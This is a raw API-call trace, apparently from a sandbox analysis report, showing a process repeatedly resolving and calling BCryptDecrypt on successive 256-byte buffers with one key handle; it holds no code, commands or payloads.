BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e67ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202ccc6, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202ccc6, pcbResult=0x14f8fc) returned 0x0 [0170.129] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.129] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e67bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202cdbb, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202cdbb, pcbResult=0x14f8fc) returned 0x0 [0170.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.131] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e67cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202ceb0, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202ceb0, pcbResult=0x14f8fc) returned 0x0 [0170.133] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.133] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e67dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202cfa5, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202cfa5, pcbResult=0x14f8fc) returned 0x0 [0170.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.136] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e67ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202d09a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202d09a, pcbResult=0x14f8fc) returned 0x0 [0170.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.138] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e67fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202d18f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202d18f, pcbResult=0x14f8fc) returned 0x0 [0170.139] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.139] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e680d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202d284, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202d284, pcbResult=0x14f8fc) returned 0x0 [0170.141] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.141] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e681d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202d379, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202d379, pcbResult=0x14f8fc) returned 0x0 [0170.142] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.142] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e682d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202d46e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202d46e, pcbResult=0x14f8fc) returned 0x0 [0170.143] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.143] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e683d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202d563, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202d563, pcbResult=0x14f8fc) returned 0x0 [0170.145] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.145] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e684d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202d658, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202d658, pcbResult=0x14f8fc) returned 0x0 [0170.146] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.146] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e685d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202d74d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202d74d, pcbResult=0x14f8fc) returned 0x0 [0170.148] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.148] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e686d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202d842, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202d842, pcbResult=0x14f8fc) returned 0x0 [0170.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.150] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e687d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202d937, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202d937, pcbResult=0x14f8fc) returned 0x0 [0170.152] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.152] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e688d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202da2c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202da2c, pcbResult=0x14f8fc) returned 0x0 [0170.153] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.153] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e689d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202db21, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202db21, pcbResult=0x14f8fc) returned 0x0 [0170.155] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.156] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e68ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202dc16, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202dc16, pcbResult=0x14f8fc) returned 0x0 [0170.158] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.158] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e68bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202dd0b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202dd0b, pcbResult=0x14f8fc) returned 0x0 [0170.282] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.282] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e68cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202de00, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202de00, pcbResult=0x14f8fc) returned 0x0 [0170.284] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.284] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e68dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202def5, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202def5, pcbResult=0x14f8fc) returned 0x0 [0170.285] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.285] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e68ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202dfea, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202dfea, pcbResult=0x14f8fc) returned 0x0 [0170.287] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.287] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e68fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202e0df, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202e0df, pcbResult=0x14f8fc) returned 0x0 [0170.288] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.288] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e690d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202e1d4, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202e1d4, pcbResult=0x14f8fc) returned 0x0 [0170.290] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.290] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e691d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202e2c9, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202e2c9, pcbResult=0x14f8fc) returned 0x0 [0170.292] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.292] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e692d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202e3be, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202e3be, pcbResult=0x14f8fc) returned 0x0 [0170.294] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.294] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e693d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202e4b3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202e4b3, pcbResult=0x14f8fc) returned 0x0 [0170.295] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.295] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e694d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202e5a8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202e5a8, pcbResult=0x14f8fc) returned 0x0 [0170.297] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.297] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e695d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202e69d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202e69d, pcbResult=0x14f8fc) returned 0x0 [0170.300] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.300] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e696d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202e792, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202e792, pcbResult=0x14f8fc) returned 0x0 [0170.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.302] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e697d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202e887, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202e887, pcbResult=0x14f8fc) returned 0x0 [0170.303] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.303] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e698d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202e97c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202e97c, pcbResult=0x14f8fc) returned 0x0 [0170.305] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.305] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e699d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202ea71, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202ea71, pcbResult=0x14f8fc) returned 0x0 [0170.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.307] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e69ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202eb66, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202eb66, pcbResult=0x14f8fc) returned 0x0 [0170.309] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.309] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e69bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202ec5b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202ec5b, pcbResult=0x14f8fc) returned 0x0 [0170.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.311] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e69cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202ed50, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202ed50, pcbResult=0x14f8fc) returned 0x0 [0170.312] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.312] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e69dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202ee45, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202ee45, pcbResult=0x14f8fc) returned 0x0 [0170.314] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.314] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e69ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202ef3a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202ef3a, pcbResult=0x14f8fc) returned 0x0 [0170.316] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.316] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e69fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202f02f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202f02f, pcbResult=0x14f8fc) returned 0x0 [0170.451] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.451] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6a0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202f124, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202f124, pcbResult=0x14f8fc) returned 0x0 [0170.452] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.452] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6a1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202f219, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202f219, pcbResult=0x14f8fc) returned 0x0 [0170.454] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.454] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6a2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202f30e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202f30e, pcbResult=0x14f8fc) returned 0x0 [0170.455] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.455] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6a3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202f403, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202f403, pcbResult=0x14f8fc) returned 0x0 [0170.457] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.457] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6a4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202f4f8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202f4f8, pcbResult=0x14f8fc) returned 0x0 [0170.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.458] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6a5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202f5ed, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202f5ed, pcbResult=0x14f8fc) returned 0x0 [0170.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.459] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6a6d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202f6e2, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202f6e2, pcbResult=0x14f8fc) returned 0x0 [0170.461] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.461] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6a7d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202f7d7, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202f7d7, pcbResult=0x14f8fc) returned 0x0 [0170.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.463] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6a8d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202f8cc, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202f8cc, pcbResult=0x14f8fc) returned 0x0 [0170.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.464] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6a9d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202f9c1, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202f9c1, pcbResult=0x14f8fc) returned 0x0 [0170.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.465] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6aad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202fab6, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202fab6, pcbResult=0x14f8fc) returned 0x0 [0170.467] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.467] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6abd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202fbab, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202fbab, pcbResult=0x14f8fc) returned 0x0 [0170.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.468] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6acd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202fca0, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202fca0, pcbResult=0x14f8fc) returned 0x0 [0170.469] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.469] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6add0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202fd95, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202fd95, pcbResult=0x14f8fc) returned 0x0 [0170.471] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.471] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6aed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202fe8a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202fe8a, pcbResult=0x14f8fc) returned 0x0 [0170.472] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.472] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6afd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x202ff7f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x202ff7f, pcbResult=0x14f8fc) returned 0x0 [0170.474] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.474] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6b0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2030074, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2030074, pcbResult=0x14f8fc) returned 0x0 [0170.475] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.476] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6b1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2030169, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2030169, pcbResult=0x14f8fc) returned 0x0 [0170.478] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.478] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6b2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203025e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203025e, pcbResult=0x14f8fc) returned 0x0 [0170.479] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.479] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6b3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2030353, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2030353, pcbResult=0x14f8fc) returned 0x0 [0170.481] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.481] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6b4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2030448, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2030448, pcbResult=0x14f8fc) returned 0x0 [0170.482] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0170.482] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e6b5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, 